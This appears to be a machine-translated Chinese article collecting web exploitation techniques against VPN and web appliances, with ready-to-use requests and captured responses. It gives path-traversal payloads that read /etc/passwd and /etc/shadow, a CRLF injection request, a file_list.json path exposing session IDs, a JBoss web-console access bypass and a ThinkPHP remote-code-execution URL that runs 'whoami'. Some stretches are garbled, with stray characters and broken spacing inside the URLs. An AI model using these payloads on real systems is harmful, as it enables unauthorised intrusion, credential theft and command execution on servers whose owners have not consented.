可以檢查安全應(yīng)用程序中的漏洞。攻擊者可能會發(fā)現(xiàn)他們可能利用的隱藏目錄和敏感文件等漏洞。
Ots ANQ
本地文件包含
帶有URL /gui/file_viewer.php的應(yīng)用程序可能容易受到本地文件包含(LFI)的攻擊。更重要的是,攻擊者可以將文件路徑附加到uloaded_filename參數(shù),該參數(shù)可以通過將特定文件的內(nèi)容包含在應(yīng)用程序Web根內(nèi)的臨時目錄中來處理特定文件。
/gui/file_viewer.php?encrypt=N&target_folder=utilities& uploaded_filename=../../../../../../../etc/passwd
通過訪問位于位置標(biāo)頭的URL參數(shù)中的URL,您將看到顯示/ etc / passwd文件的內(nèi)容:
目錄回顯
CRLF注入
另一個示例是攻擊者可能試圖注入CRLF字符(例如%0A)使用以下網(wǎng)址:
https://<host - 域名>/__session_start__/
數(shù)據(jù)包情況:
GET /__session_start__/%0atest HTTP/1.1Host: https://<host>User-Agent: Mozilla/5.0 (X11; linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,Application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeCookie: openvpn_sess_******=**********Pragma: no-cacheCache-Control: no-cache
GET 頭部 的一個情況
/_session_start_/%0atest
回響包:
HTTP/1.1 302 FoundDate: Sat, 25 April 2020 08:25:38 GMTConnection: closeContent-Type: text/html; charset=UTF-8Location: https://<host>testServer: OpenVPN-AS<html> <body> <p>REDIRECT</p> </body></html>
我們可以看到已考慮%0A字符,并且字符串本身落在了無法預(yù)料的位置。
file_list.json
攻擊者還可以更改/+CSCOU+/../+CSCOE+/files/file_list.json的路徑,以從Web界面列出特定文件。
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/
可以找到與其連接的用戶ID。該漏洞可能允許攻擊者瀏覽文件并泄露敏感信息。
遠程執(zhí)行代碼
攻擊者可能會將自己重定向到JBoss Web控制臺頁面,這意味著使用以下命令轉(zhuǎn)到在localhost上運行的JBoss實例:
https:// <主機 ip - 域名> / josso /%5C ../ web-console
攻擊者可以將每個請求傳輸?shù)?josso/%5C../web-console,這意味著他們可以在服務(wù)器上完成所需的任何操作,例如查看備份SQL轉(zhuǎn)儲或更改主頁。
目錄遍歷和本地文件包含
攻擊者可以通過logName參數(shù)上的/ server / logs / download URL 獲得對目標(biāo)服務(wù)器的本地文件系統(tǒng)的未經(jīng)授權(quán)的訪問。這允許攻擊者通過zip文件派生敏感的本地文件,例如/ etc / passwd或/ etc / shadow。例:
https:// <主機> / server / logs / download?logType = error&logName = .. / .. / .. / .. / .. / .. / .. / .. / etc / shadow&logSource = engine
數(shù)據(jù)響應(yīng)包:
HTTP/1.1 200 OKContent-Type: application/octet-stream Content-Disposition: attachment; filename=”shadow.zip”Connection: Close
如您所見,/ etc / shadow的內(nèi)容包含在下載的shadow.zip文件中。
/ assets /中
的/ etc / passwd / etc / passwd的內(nèi)容可能在/ assets /目錄中可讀:
/assets/file:%2f%2f/etc/passwd
遠程代碼執(zhí)行(RCE)
遠程代碼執(zhí)行可以通過HTTP請求執(zhí)行:
/ public //?s = index / think app / invokefunction&function = call_user_func_array&vars [0] = system&vars [1] [] = whoami
http:// <ip - 域名>:8080 / public //?s = index / think app / invokefunction&function = call_user_func_array&vars [0] = system&vars [1] [] = whoami
數(shù)據(jù)包響應(yīng):
HTTP/1.1 200 OKDate: Sat, 25 Apr 2020 0:5:12 GMTServer: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45X-Powered-By: PHP/5.4.45Content-Length: 60Connection: closeContent-Type: text/html; charset=utf-8?win-**********administratorwin-**********administrator